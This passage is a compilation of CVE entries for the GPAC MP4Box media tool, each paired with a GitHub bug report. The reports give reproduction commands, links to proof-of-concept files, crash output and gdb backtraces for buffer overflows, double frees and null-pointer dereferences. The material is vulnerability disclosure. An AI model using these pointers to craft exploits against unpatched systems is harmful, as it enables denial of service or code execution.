/mnt/data/playground/gpac/applications/mp4box/main.c:6329 #12 0x0000000001f06bb6 in generic_start_main () #13 0x0000000001f071a5 in __libc_start_main () #14 0x000000000041c4e9 in _start () ~~~~

Segmentation fault using mp4box in gf_odf_size_descriptor, desc_private.c:380

https://api.github.com/repos/gpac/gpac/issues/1889/comments

2021-08-24T11:14:59Z

2021-08-30T15:34:45Z

https://github.com/gpac/gpac/issues/1889

CVE-2021-40568

2022-01-13T18:15:07.977

A buffer overflow vulnerability exists in Gpac through 1.0.1 via a malformed MP4 file in the svc_parse_slice function in av_parsers.c, which allows attackers to cause a denial of service, even code execution and escalation of privileges.

https://github.com/gpac/gpac/issues/1900

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault caused by buffer overflow (overwrite) in svc_parse_slice, av_parsers.c:5788 in commit 592ba2689a3. This vulnerability is similar to the npd reported in #1898. However, this one is more serious since it allows memory manipulation. <img width="777" alt="image" src="https://user-images.githubusercontent.com/7632714/131103671-25924388-bc11-4954-871c-34eb354c6521.png"> Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7065690/mp4box-seg-overflow_svc_parse_slice5788.zip) (unzip first) Program output: ~~~~ [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [AVC|H264] Warning: Error parsing NAL unit [AVC|H264] Error parsing Sequence Param Set [AVC|H264] Warning: Error parsing NAL unit [AVC|H264] Error parsing Sequence Param Set [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [AVC|H264] Warning: Error parsing NAL unit Segmentation fault (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef➤ bt #0 0x0000000000bccc05 in svc_parse_slice (si=0x7fffffff5020, avc=0x24ae050, bs=0x2491de0) at /mnt/data/playground/gpac/src/media_tools/av_parsers.c:5788 #1 gf_avc_parse_nalu (bs=0x2491de0, avc=0x24ae050) at /mnt/data/playground/gpac/src/media_tools/av_parsers.c:6062 #2 0x000000000144109d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type=0x14, size=0x2c, data=0x24b84a1 "trak", ctx=0x24ada70) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2348 #3 naludmx_process (filter=0x24a0bd0) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2874 #4 0x0000000000fe4c18 in gf_filter_process_task (task=0x248e770) at /mnt/data/playground/gpac/src/filter_core/filter.c:2441 #5 0x0000000000f7b909 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x248c2b0) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1640 #6 0x0000000000f93558 in gf_fs_run (fsess=fsess@entry=0x248c220) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1877 #7 0x0000000000c18b4b in gf_media_import (importer=importer@entry=0x7fffffff5bf0) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1178 #8 0x0000000000497345 in convert_file_info (inName=0x7fffffffe159 "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128 #9 0x0000000000456aaa in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925 #10 0x0000000001f06bb6 in generic_start_main () #11 0x0000000001f071a5 in __libc_start_main () #12 0x000000000041c4e9 in _start () ~~~~

Segmentation fault caused by buffer overflow using mp4box in svc_parse_slice, av_parsers.c:5788

https://api.github.com/repos/gpac/gpac/issues/1900/comments

2021-08-27T09:14:32Z

2021-08-30T15:33:45Z

https://github.com/gpac/gpac/issues/1900

CVE-2021-40569

2022-01-13T18:15:08.020

The binary MP4Box in Gpac through 1.0.1 has a double-free vulnerability in the iloc_entry_del funciton in box_code_meta.c, which allows attackers to cause a denial of service.

https://github.com/gpac/gpac/issues/1890

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault in gf_free, alloc.c:165 in commit 592ba2689a3 caused by double free issue. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -hint poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7043899/mp4box-doublefree_alloc165.zip) (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef➤ bt #0 0x0000000001f31acf in free () #1 0x000000000053de4d in gf_free (ptr=<optimized out>) at /mnt/data/playground/gpac/src/utils/alloc.c:165 #2 0x00000000019f3d5d in iloc_entry_del (location=0x3dd8780) at /mnt/data/playground/gpac/src/isomedia/box_code_meta.c:242 #3 iloc_box_del (s=0x248f080) at /mnt/data/playground/gpac/src/isomedia/box_code_meta.c:256 #4 0x00000000008fa22f in gf_isom_box_del (a=0x248f080) at /mnt/data/playground/gpac/src/isomedia/box_funcs.c:1794 #5 0x0000000000900b5c in gf_isom_box_parse_ex (outBox=outBox@entry=0x7fffffff9360, bs=bs@entry=0x248c750, is_root_box=is_root_box@entry=GF_TRUE, parent_type=0x0) at /mnt/data/playground/gpac/src/isomedia/box_funcs.c:303 #6 0x0000000000900cf2 in gf_isom_parse_root_box (outBox=outBox@entry=0x7fffffff9360, bs=0x248c750, box_type=box_type@entry=0x0, bytesExpected=bytesExpected@entry=0x7fffffff93b0, progressive_mode=progressive_mode@entry=GF_FALSE) at /mnt/data/playground/gpac/src/isomedia/box_funcs.c:38 #7 0x000000000093551f in gf_isom_parse_movie_boxes_internal (mov=mov@entry=0x248c220, boxType=boxType@entry=0x0, bytesMissing=bytesMissing@entry=0x7fffffff93b0, progressive_mode=progressive_mode@entry=GF_FALSE) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:320 #8 0x000000000093e251 in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, bytesMissing=0x7fffffff93b0, boxType=0x0, mov=0x248c220) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:781 #9 gf_isom_open_file (fileName=0x7fffffffe159 "tmp", OpenMode=<optimized out>, tmp_dir=0x0) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:901 #10 0x0000000000454a80 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5841 #11 0x0000000001f06bb6 in generic_start_main () #12 0x0000000001f071a5 in __libc_start_main () #13 0x000000000041c4e9 in _start () ~~~~ It seems that the pointer has been free previously in configfile.c <img width="615" alt="image" src="https://user-images.githubusercontent.com/7632714/130732366-c06e6fe8-f884-47e7-9bae-ca90891284e1.png">

Segmentation fault caused by double free using mp4box in iloc_entry_del, box_code_meta.c:242

https://api.github.com/repos/gpac/gpac/issues/1890/comments

2021-08-25T05:36:34Z

2021-08-30T15:33:43Z

https://github.com/gpac/gpac/issues/1890

CVE-2021-40570

2022-01-13T18:15:08.063

The binary MP4Box in Gpac 1.0.1 has a double-free vulnerability in the avc_compute_poc function in av_parsers.c, which allows attackers to cause a denial of service, even code execution and escalation of privileges.

https://github.com/gpac/gpac/issues/1899

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault caused by buffer overflow in avc_compute_poc, av_parsers.c:5988 in commit 592ba2689a3. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7065639/mp4box-seg-overflow_avc_compute_poc5988.zip) (unzip first) Program output: ~~~~ [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [avc-h264] offset_for_ref_frame overflow from poc_cycle_length [AVC|H264] Warning: Error parsing NAL unit [AVC|H264] Error parsing Sequence Param Set [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! Segmentation fault (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef➤ bt #0 0x0000000000b82f00 in avc_compute_poc (si=si@entry=0x7fffffff5020) at /mnt/data/playground/gpac/src/media_tools/av_parsers.c:5988 #1 0x0000000000bce182 in gf_avc_parse_nalu (bs=<optimized out>, avc=0x24ae050) at /mnt/data/playground/gpac/src/media_tools/av_parsers.c:6191 #2 0x000000000144109d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type=0x3, size=0xf, data=0x248dfba "Cd\234\316s", <incomplete sequence \350>, ctx=0x24ada70) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2348 #3 naludmx_process (filter=0x24a0bd0) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2874 #4 0x0000000000fe4c18 in gf_filter_process_task (task=0x2492ed0) at /mnt/data/playground/gpac/src/filter_core/filter.c:2441 #5 0x0000000000f7b909 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x248c2b0) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1640 #6 0x0000000000f93558 in gf_fs_run (fsess=fsess@entry=0x248c220) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1877 #7 0x0000000000c18b4b in gf_media_import (importer=importer@entry=0x7fffffff5bf0) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1178 #8 0x0000000000497345 in convert_file_info (inName=0x7fffffffe159 "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128 #9 0x0000000000456aaa in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925 #10 0x0000000001f06bb6 in generic_start_main () #11 0x0000000001f071a5 in __libc_start_main () #12 0x000000000041c4e9 in _start () ~~~~ The reason for this bug is that the program does not check whether the length of a buffer fit its actual size. <img width="922" alt="image" src="https://user-images.githubusercontent.com/7632714/131101665-2c1728e7-19c6-48af-ba1c-832d2f2d6a2e.png">

Segmentation fault caused by buffer overflow using mp4box in avc_compute_poc, av_parsers.c:5988

https://api.github.com/repos/gpac/gpac/issues/1899/comments

2021-08-27T09:02:37Z

2021-08-30T15:33:45Z

https://github.com/gpac/gpac/issues/1899

CVE-2021-40571

2022-01-13T18:15:08.113

The binary MP4Box in Gpac 1.0.1 has a double-free vulnerability in the ilst_box_read function in box_code_apple.c, which allows attackers to cause a denial of service, even code execution and escalation of privileges.

https://github.com/gpac/gpac/issues/1895

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault caused by null pointer dereference in ilst_box_read, box_code_apple.c:50 in commit 592ba2689a3. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -hint poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7056022/mp4box-seg-npd_ilst_box_read50.zip) (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef➤ bt #0 0x0000000001963358 in ilst_box_read (s=0x248f740, bs=0x248c750) at /mnt/data/playground/gpac/src/isomedia/box_code_apple.c:50 #1 0x00000000008ff1fa in gf_isom_box_read (bs=0x248c750, a=0x248f740) at /mnt/data/playground/gpac/src/isomedia/box_funcs.c:1810 #2 gf_isom_box_parse_ex (outBox=outBox@entry=0x7fffffff9360, bs=bs@entry=0x248c750, is_root_box=is_root_box@entry=GF_TRUE, parent_type=0x0) at /mnt/data/playground/gpac/src/isomedia/box_funcs.c:263 #3 0x0000000000900cf2 in gf_isom_parse_root_box (outBox=outBox@entry=0x7fffffff9360, bs=0x248c750, box_type=box_type@entry=0x0, bytesExpected=bytesExpected@entry=0x7fffffff93b0, progressive_mode=progressive_mode@entry=GF_FALSE) at /mnt/data/playground/gpac/src/isomedia/box_funcs.c:38 #4 0x000000000093551f in gf_isom_parse_movie_boxes_internal (mov=mov@entry=0x248c220, boxType=boxType@entry=0x0, bytesMissing=bytesMissing@entry=0x7fffffff93b0, progressive_mode=progressive_mode@entry=GF_FALSE) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:320 #5 0x000000000093e251 in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, bytesMissing=0x7fffffff93b0, boxType=0x0, mov=0x248c220) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:781 #6 gf_isom_open_file (fileName=0x7fffffffe159 "tmp", OpenMode=<optimized out>, tmp_dir=0x0) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:901 #7 0x0000000000454a80 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5841 #8 0x0000000001f06bb6 in generic_start_main () #9 0x0000000001f071a5 in __libc_start_main () #10 0x000000000041c4e9 in _start () ~~~~

Segmentation fault using mp4box in ilst_box_read, box_code_apple.c:50

https://api.github.com/repos/gpac/gpac/issues/1895/comments

2021-08-26T09:51:24Z

2021-08-30T15:33:44Z

https://github.com/gpac/gpac/issues/1895

CVE-2021-40572

2022-01-13T19:15:08.217

The binary MP4Box in Gpac 1.0.1 has a double-free bug in the av1dmx_finalize function in reframe_av1.c, which allows attackers to cause a denial of service.

https://github.com/gpac/gpac/issues/1893

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault in av1dmx_finalize, reframe_av1.c:1075 in commit 592ba2689a3 caused by double free issue. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -hint poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7044542/mp4box-doublefree_av1dmx_finalize1075.zip) (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGABRT gef➤ bt #0 0x0000000001f15d08 in raise () #1 0x0000000001f15f3a in abort () #2 0x0000000001f24ed6 in __libc_message () #3 0x0000000001f2da76 in _int_free () #4 0x0000000001f31af7 in free () #5 0x000000000053de4d in gf_free (ptr=<optimized out>) at /mnt/data/playground/gpac/src/utils/alloc.c:165 #6 0x00000000013e3d4d in av1dmx_finalize (filter=<optimized out>) at /mnt/data/playground/gpac/src/filters/reframe_av1.c:1075 #7 0x0000000000f9949c in gf_fs_del (fsess=fsess@entry=0x248c220) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:646 #8 0x0000000000c1a86a in gf_media_import (importer=importer@entry=0x7fffffff5bf0) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1242 #9 0x0000000000497345 in convert_file_info (inName=0x7fffffffe159 "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128 #10 0x0000000000456aaa in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925 #11 0x0000000001f06bb6 in generic_start_main () #12 0x0000000001f071a5 in __libc_start_main () #13 0x000000000041c4e9 in _start () ~~~~

Segmentation fault caused by double free using mp4box in av1dmx_finalize, reframe_av1.c:1075

https://api.github.com/repos/gpac/gpac/issues/1893/comments

2021-08-25T07:18:42Z

2021-09-01T10:06:57Z

https://github.com/gpac/gpac/issues/1893

CVE-2021-40573

2022-01-13T19:15:08.267

The binary MP4Box in Gpac 1.0.1 has a double-free vulnerability in the gf_list_del function in list.c, which allows attackers to cause a denial of service.

https://github.com/gpac/gpac/issues/1891

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a system abort in gf_free, alloc.c:165 in commit 592ba2689a3 caused by double free issue, it is similar to issue #1890 but the scenario is different. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -hint poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7044249/mp4box-abrt-doublefree_alloc165.zip) (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGABRT gef➤ bt #0 0x0000000001f15d08 in raise () #1 0x0000000001f15f3a in abort () #2 0x0000000001f24ed6 in __libc_message () #3 0x0000000001f2da76 in _int_free () #4 0x0000000001f31af7 in free () #5 0x000000000053de4d in gf_free (ptr=<optimized out>) at /mnt/data/playground/gpac/src/utils/alloc.c:165 #6 0x00000000004f8c14 in gf_list_del (ptr=0x482f2f0) at /mnt/data/playground/gpac/src/utils/list.c:614 #7 0x00000000019f4315 in iloc_entry_del (location=0x480b370) at /mnt/data/playground/gpac/src/isomedia/box_code_meta.c:244 #8 iloc_box_del (s=0x248f080) at /mnt/data/playground/gpac/src/isomedia/box_code_meta.c:256 #9 0x00000000008fa22f in gf_isom_box_del (a=0x248f080) at /mnt/data/playground/gpac/src/isomedia/box_funcs.c:1794 #10 0x0000000000900b5c in gf_isom_box_parse_ex (outBox=outBox@entry=0x7fffffff9360, bs=bs@entry=0x248c750, is_root_box=is_root_box@entry=GF_TRUE, parent_type=0x0) at /mnt/data/playground/gpac/src/isomedia/box_funcs.c:303 #11 0x0000000000900cf2 in gf_isom_parse_root_box (outBox=outBox@entry=0x7fffffff9360, bs=0x248c750, box_type=box_type@entry=0x0, bytesExpected=bytesExpected@entry=0x7fffffff93b0, progressive_mode=progressive_mode@entry=GF_FALSE) at /mnt/data/playground/gpac/src/isomedia/box_funcs.c:38 #12 0x000000000093551f in gf_isom_parse_movie_boxes_internal (mov=mov@entry=0x248c220, boxType=boxType@entry=0x0, bytesMissing=bytesMissing@entry=0x7fffffff93b0, progressive_mode=progressive_mode@entry=GF_FALSE) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:320 #13 0x000000000093e251 in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, bytesMissing=0x7fffffff93b0, boxType=0x0, mov=0x248c220) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:781 #14 gf_isom_open_file (fileName=0x7fffffffe159 "tmp", OpenMode=<optimized out>, tmp_dir=0x0) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:901 #15 0x0000000000454a80 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5841 #16 0x0000000001f06bb6 in generic_start_main () #17 0x0000000001f071a5 in __libc_start_main () #18 0x000000000041c4e9 in _start () ~~~~

System abort caused by double free using mp4box, gf_list_del, list.c:614

https://api.github.com/repos/gpac/gpac/issues/1891/comments

2021-08-25T06:44:03Z

2021-08-30T15:35:16Z

https://github.com/gpac/gpac/issues/1891

CVE-2021-40574

2022-01-13T19:15:08.317

The binary MP4Box in Gpac 1.0.1 has a double-free vulnerability in the gf_text_get_utf8_line function in load_text.c, which allows attackers to cause a denial of service, even code execution and escalation of privileges.

https://github.com/gpac/gpac/issues/1897

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a buffer overflow in gf_text_get_utf8_line, in commit 592ba2689a3 that results in system abort (core dumped). Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7058142/mp4box-seg-abrt-overflow_gf_text_get_utf8.zip) (unzip first) This is the output of the program: ~~~~ *** stack smashing detected ***: <unknown> terminated Aborted (core dumped) ~~~~ Here is the trace reported by gdb (the stack is smashed): ~~~~ Stopped reason: SIGABRT gef➤ bt #0 0x0000000001f15d08 in raise () #1 0x0000000001f15f3a in abort () #2 0x0000000001f24ed6 in __libc_message () #3 0x0000000001f70a92 in __fortify_fail () #4 0x0000000001f70a3e in __stack_chk_fail () #5 0x000000000127f3ad in gf_text_get_utf8_line (szLine=<optimized out>, lineSize=<optimized out>, txt_in=<optimized out>, unicode_type=0x0) at /mnt/data/playground/gpac/src/filters/load_text.c:337 #6 0xc2657485c3a5c37e in ?? () #7 0xbcc3739fc3314583 in ?? () #8 0x0748654e86c3aac3 in ?? () .... #14 0x609ec3a0c3a7c26e in ?? () #15 0x11bdcd643758a5c3 in ?? () #16 0x00000000009ac35e in gf_isom_load_extra_boxes (movie=0xc53f89c4114aacc2, moov_boxes=<optimized out>, moov_boxes_size=<optimized out>, udta_only=(unknown: 2747429506)) at /mnt/data/playground/gpac/src/isomedia/isom_write.c:615 #17 0x0000000000000000 in ?? () ~~~~

System abort (Core dumped) caused by buffer overflow using MP4Box in gf_text_get_utf8_line

https://api.github.com/repos/gpac/gpac/issues/1897/comments

2021-08-26T11:19:33Z

2021-08-30T15:33:45Z

https://github.com/gpac/gpac/issues/1897

CVE-2021-40575

2022-01-13T19:15:08.367

The binary MP4Box in Gpac 1.0.1 has a null pointer dereference vulnerability in the mpgviddmx_process function in reframe_mpgvid.c, which allows attackers to cause a denial of service. This vulnerability is possibly due to an incomplete fix for CVE-2021-40566.

https://github.com/gpac/gpac/issues/1905

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault caused by null pointer dereference in mpgviddmx_process, reframe_mpgvid.c:643 in commit d003a572d57. It seems to be an incomplete fix of issue #1887 and causes another problem. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1191-g55d6dbc-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7088610/mp4box-seg-npd-mpgviddmx_process643.zip) (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef➤ bt #0 0x000000000141a950 in memcpy (__len=0xffffffffffffffff, __src=0x24ada59, __dest=0x24a5770) at /usr/include/x86_64-linux-gnu/bits/string3.h:53 #1 mpgviddmx_process (filter=0x24a0bd0) at /mnt/data/playground/gpac/src/filters/reframe_mpgvid.c:643 #2 